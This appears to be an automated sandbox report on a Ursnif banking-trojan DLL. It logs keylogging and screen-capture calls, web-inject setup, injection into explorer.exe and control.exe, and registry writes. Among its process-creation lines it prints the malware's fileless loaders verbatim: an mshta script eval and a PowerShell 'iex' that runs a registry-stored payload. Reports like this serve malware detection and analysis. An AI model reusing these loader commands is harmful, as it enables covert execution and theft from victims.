            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownHTTPS traffic detected: 104.16.249.249:443 -> 192.168.2.4:49794 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.704231467.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.704303673.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.1038694426.0000027D4F836000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.704163545.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.1047039764.0000000004DD6000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000003.868598752.000001EB11270000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.704264515.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.704123248.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.877735219.00000000030F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.704325242.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5964, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4552, type: MEMORY
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_004225C8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,1_2_004225C8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00449950 GetKeyboardState,0_2_00449950

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.704231467.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.704303673.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.1038694426.0000027D4F836000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.704163545.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.1047039764.0000000004DD6000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000003.868598752.000001EB11270000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.704264515.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.704123248.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.877735219.00000000030F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.704325242.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5964, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4552, type: MEMORY
            Disables SPDY (HTTP compression, likely to perform web injects)Show sources
            Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0044C8CC NtdllDefWindowProc_A,GetCapture,0_2_0044C8CC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0042863C NtdllDefWindowProc_A,0_2_0042863C
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0044281C GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_0044281C
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00439348 NtdllDefWindowProc_A,0_2_00439348
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00439AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_00439AF0
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00439BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_00439BA0
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02C914E8 NtCreateSection,memset,0_2_02C914E8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02C9183B NtMapViewOfSection,0_2_02C9183B
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02C922C5 NtQueryVirtualMemory,0_2_02C922C5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F372D8 NtMapViewOfSection,0_2_02F372D8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F31371 GetProcAddress,NtCreateSection,memset,0_2_02F31371
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F37507 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_02F37507
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F3B2F1 NtQueryVirtualMemory,0_2_02F3B2F1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0044C8CC NtdllDefWindowProc_A,GetCapture,1_2_0044C8CC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0042863C NtdllDefWindowProc_A,1_2_0042863C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0044281C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,1_2_0044281C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00439348 NtdllDefWindowProc_A,1_2_00439348
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00439AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,1_2_00439AF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_00439BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,1_2_00439BA0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_045422C5 NtQueryVirtualMemory,1_2_045422C5
            Source: C:\Windows\explorer.exeCode function: 37_2_04DA14D0 NtQueryInformationProcess,37_2_04DA14D0
            Source: C:\Windows\explorer.exeCode function: 37_2_04DC20B4 NtQueryInformationProcess,37_2_04DC20B4
            Source: C:\Windows\explorer.exeCode function: 37_2_04DC4064 NtMapViewOfSection,37_2_04DC4064
            Source: C:\Windows\explorer.exeCode function: 37_2_04DA7008 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,37_2_04DA7008
            Source: C:\Windows\explorer.exeCode function: 37_2_04DA5DF4 RtlAllocateHeap,NtCreateSection,37_2_04DA5DF4
            Source: C:\Windows\explorer.exeCode function: 37_2_04DC7278 NtWriteVirtualMemory,37_2_04DC7278
            Source: C:\Windows\explorer.exeCode function: 37_2_04DA527C NtAllocateVirtualMemory,37_2_04DA527C
            Source: C:\Windows\explorer.exeCode function: 37_2_04DB6A74 NtQuerySystemInformation,37_2_04DB6A74
            Source: C:\Windows\explorer.exeCode function: 37_2_04DB2FD0 NtQueryInformationProcess,37_2_04DB2FD0
            Source: C:\Windows\explorer.exeCode function: 37_2_04DBFF54 NtReadVirtualMemory,37_2_04DBFF54
            Source: C:\Windows\explorer.exeCode function: 37_2_04DAEF1C NtSetContextThread,NtUnmapViewOfSection,NtClose,37_2_04DAEF1C
            Source: C:\Windows\explorer.exeCode function: 37_2_04DB4B24 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification,37_2_04DB4B24
            Source: C:\Windows\explorer.exeCode function: 37_2_04DDA002 NtProtectVirtualMemory,NtProtectVirtualMemory,37_2_04DDA002
            Source: C:\Windows\System32\control.exeCode function: 38_2_00117008 NtQueryInformationToken,NtQueryInformationToken,NtClose,38_2_00117008
            Source: C:\Windows\System32\control.exeCode function: 38_2_00134064 NtMapViewOfSection,38_2_00134064
            Source: C:\Windows\System32\control.exeCode function: 38_2_001320B4 NtQueryInformationProcess,38_2_001320B4
            Source: C:\Windows\System32\control.exeCode function: 38_2_001114D0 NtQueryInformationProcess,38_2_001114D0
            Source: C:\Windows\System32\control.exeCode function: 38_2_00115DF4 NtCreateSection,38_2_00115DF4
            Source: C:\Windows\System32\control.exeCode function: 38_2_00137278 NtWriteVirtualMemory,38_2_00137278
            Source: C:\Windows\System32\control.exeCode function: 38_2_0011527C NtAllocateVirtualMemory,38_2_0011527C
            Source: C:\Windows\System32\control.exeCode function: 38_2_0011EF1C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,38_2_0011EF1C
            Source: C:\Windows\System32\control.exeCode function: 38_2_00124B24 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,38_2_00124B24
            Source: C:\Windows\System32\control.exeCode function: 38_2_0012FF54 NtReadVirtualMemory,38_2_0012FF54
            Source: C:\Windows\System32\control.exeCode function: 38_2_0014A002 NtProtectVirtualMemory,NtProtectVirtualMemory,38_2_0014A002
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0044281C0_2_0044281C
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_004338400_2_00433840
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02C920A40_2_02C920A4
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F323FC0_2_02F323FC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F3936B0_2_02F3936B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0044281C1_2_0044281C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_004338401_2_00433840
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_045420A41_2_045420A4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_045216181_2_04521618
            Source: C:\Windows\explorer.exeCode function: 37_2_04DC0CDC37_2_04DC0CDC
            Source: C:\Windows\explorer.exeCode function: 37_2_04DBA0C437_2_04DBA0C4
            Source: C:\Windows\explorer.exeCode function: 37_2_04DA58FC37_2_04DA58FC
            Source: C:\Windows\explorer.exeCode function: 37_2_04DB208037_2_04DB2080
            Source: C:\Windows\explorer.exeCode function: 37_2_04DAA8B837_2_04DAA8B8
            Source: C:\Windows\explorer.exeCode function: 37_2_04DB059C37_2_04DB059C
            Source: C:\Windows\explorer.exeCode function: 37_2_04DBE17837_2_04DBE178
            Source: C:\Windows\explorer.exeCode function: 37_2_04DB352037_2_04DB3520
            Source: C:\Windows\explorer.exeCode function: 37_2_04DC36F437_2_04DC36F4
            Source: C:\Windows\explorer.exeCode function: 37_2_04DBAE9437_2_04DBAE94
            Source: C:\Windows\explorer.exeCode function: 37_2_04DA16B437_2_04DA16B4
            Source: C:\Windows\explorer.exeCode function: 37_2_04DA7A0C37_2_04DA7A0C
            Source: C:\Windows\explorer.exeCode function: 37_2_04DB537C37_2_04DB537C
            Source: C:\Windows\explorer.exeCode function: 37_2_04DAEF1C37_2_04DAEF1C
            Source: C:\Windows\explorer.exeCode function: 37_2_04DC40F837_2_04DC40F8
            Source: C:\Windows\explorer.exeCode function: 37_2_04DA308837_2_04DA3088
            Source: C:\Windows\explorer.exeCode function: 37_2_04DBE87C37_2_04DBE87C
            Source: C:\Windows\explorer.exeCode function: 37_2_04DC501037_2_04DC5010
            Source: C:\Windows\explorer.exeCode function: 37_2_04DA482837_2_04DA4828
            Source: C:\Windows\explorer.exeCode function: 37_2_04DC299437_2_04DC2994
            Source: C:\Windows\explorer.exeCode function: 37_2_04DAD59037_2_04DAD590
            Source: C:\Windows\explorer.exeCode function: 37_2_04DB154C37_2_04DB154C
            Source: C:\Windows\explorer.exeCode function: 37_2_04DAB17037_2_04DAB170
            Source: C:\Windows\explorer.exeCode function: 37_2_04DA616837_2_04DA6168
            Source: C:\Windows\explorer.exeCode function: 37_2_04DADD1837_2_04DADD18
            Source: C:\Windows\explorer.exeCode function: 37_2_04DAAD0337_2_04DAAD03
            Source: C:\Windows\explorer.exeCode function: 37_2_04DB850437_2_04DB8504
            Source: C:\Windows\explorer.exeCode function: 37_2_04DB013437_2_04DB0134
            Source: C:\Windows\explorer.exeCode function: 37_2_04DA66D037_2_04DA66D0
            Source: C:\Windows\explorer.exeCode function: 37_2_04DA1AD037_2_04DA1AD0
            Source: C:\Windows\explorer.exeCode function: 37_2_04DB6E8837_2_04DB6E88
            Source: C:\Windows\explorer.exeCode function: 37_2_04DC1A3037_2_04DC1A30
            Source: C:\Windows\explorer.exeCode function: 37_2_04DABF6C37_2_04DABF6C
            Source: C:\Windows\explorer.exeCode function: 37_2_04DAB73037_2_04DAB730
            Source: C:\Windows\explorer.exeCode function: 37_2_04DB3F2C37_2_04DB3F2C
            Source: C:\Windows\explorer.exeCode function: 37_2_04DACF2437_2_04DACF24
            Source: C:\Windows\System32\control.exeCode function: 38_2_00130CDC38_2_00130CDC
            Source: C:\Windows\System32\control.exeCode function: 38_2_0012059C38_2_0012059C
            Source: C:\Windows\System32\control.exeCode function: 38_2_0011EF1C38_2_0011EF1C
            Source: C:\Windows\System32\control.exeCode function: 38_2_0013501038_2_00135010
            Source: C:\Windows\System32\control.exeCode function: 38_2_0011482838_2_00114828
            Source: C:\Windows\System32\control.exeCode function: 38_2_0012E87C38_2_0012E87C
            Source: C:\Windows\System32\control.exeCode function: 38_2_0012208038_2_00122080
            Source: C:\Windows\System32\control.exeCode function: 38_2_0011308838_2_00113088
            Source: C:\Windows\System32\control.exeCode function: 38_2_0011A8B838_2_0011A8B8
            Source: C:\Windows\System32\control.exeCode function: 38_2_0012A0C438_2_0012A0C4
            Source: C:\Windows\System32\control.exeCode function: 38_2_001340F838_2_001340F8
            Source: C:\Windows\System32\control.exeCode function: 38_2_001158FC38_2_001158FC
            Source: C:\Windows\System32\control.exeCode function: 38_2_0011DD1838_2_0011DD18
            Source: C:\Windows\System32\control.exeCode function: 38_2_0011AD0338_2_0011AD03
            Source: C:\Windows\System32\control.exeCode function: 38_2_0012850438_2_00128504
            Source: C:\Windows\System32\control.exeCode function: 38_2_0012013438_2_00120134
            Source: C:\Windows\System32\control.exeCode function: 38_2_0012352038_2_00123520
            Source: C:\Windows\System32\control.exeCode function: 38_2_0012154C38_2_0012154C
            Source: C:\Windows\System32\control.exeCode function: 38_2_0011B17038_2_0011B170
            Source: C:\Windows\System32\control.exeCode function: 38_2_0012E17838_2_0012E178
            Source: C:\Windows\System32\control.exeCode function: 38_2_0011616838_2_00116168
            Source: C:\Windows\System32\control.exeCode function: 38_2_0011D59038_2_0011D590
            Source: C:\Windows\System32\control.exeCode function: 38_2_0013299438_2_00132994
            Source: C:\Windows\System32\control.exeCode function: 38_2_00117A0C38_2_00117A0C
            Source: C:\Windows\System32\control.exeCode function: 38_2_00131A3038_2_00131A30
            Source: C:\Windows\System32\control.exeCode function: 38_2_0012AE9438_2_0012AE94
            Source: C:\Windows\System32\control.exeCode function: 38_2_00126E8838_2_00126E88
            Source: C:\Windows\System32\control.exeCode function: 38_2_001116B438_2_001116B4
            Source: C:\Windows\System32\control.exeCode function: 38_2_00111AD038_2_00111AD0
            Source: C:\Windows\System32\control.exeCode function: 38_2_001166D038_2_001166D0
            Source: C:\Windows\System32\control.exeCode function: 38_2_001336F438_2_001336F4
            Source: C:\Windows\System32\control.exeCode function: 38_2_0011B73038_2_0011B730
            Source: C:\Windows\System32\control.exeCode function: 38_2_0011CF2438_2_0011CF24
            Source: C:\Windows\System32\control.exeCode function: 38_2_00123F2C38_2_00123F2C
            Source: C:\Windows\System32\control.exeCode function: 38_2_0012537C38_2_0012537C
            Source: C:\Windows\System32\loaddll32.exeCode function: String function: 00403EBC appears 75 times
            Source: C:\Windows\System32\loaddll32.exeCode function: String function: 00406224 appears 61 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 00403EBC appears 77 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 00406224 appears 61 times
            Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 756
            Source: yytr.dllStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
            Source: maejgtwh.dll.35.drStatic PE information: No import functions for PE file found
            Source: qxfma03s.dll.33.drStatic PE information: No import functions for PE file found
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: yytr.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
            Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winDLL@47/76@10/3
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00420AE8 GetLastError,FormatMessageA,0_2_00420AE8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_004085C6 GetDiskFreeSpaceA,0_2_004085C6
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F382EB CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,0_2_02F382EB
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00416AE4 FindResourceA,0_2_00416AE4
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{0A3DC979-6AC5-11EB-90EB-ECF4BBEA1588}.datJump to behavior
            Source: C:\Windows\System32\loaddll32.exeMutant created: \Sessions\1\BaseNamedObjects\{305FBD52-CFE8-E23F-D964-73361DD857CA}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{7C7FA6C6-ABD4-0EE2-1570-0F2219A4B376}
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4576
            Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{8C972E34-7B6D-9E84-6580-DFB269B48306}
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B01.tmpJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1
            Source: yytr.dllVirustotal: Detection: 43%
            Source: yytr.dllReversingLabs: Detection: 39%
            Source: loaddll32.exeString found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\yytr.dll'
            Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1
            Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 756
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6556 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5988 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:82956 /prefetch:2
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC08.tmp' 'c:\Users\user\AppData\Local\Temp\qxfma03s\CSC9A61D8937933426B894F97C05C536C75.TMP'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDFCF.tmp' 'c:\Users\user\AppData\Local\Temp\maejgtwh\CSC5E7D34BFE3B047248BD36616B57FD91.TMP'
            Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
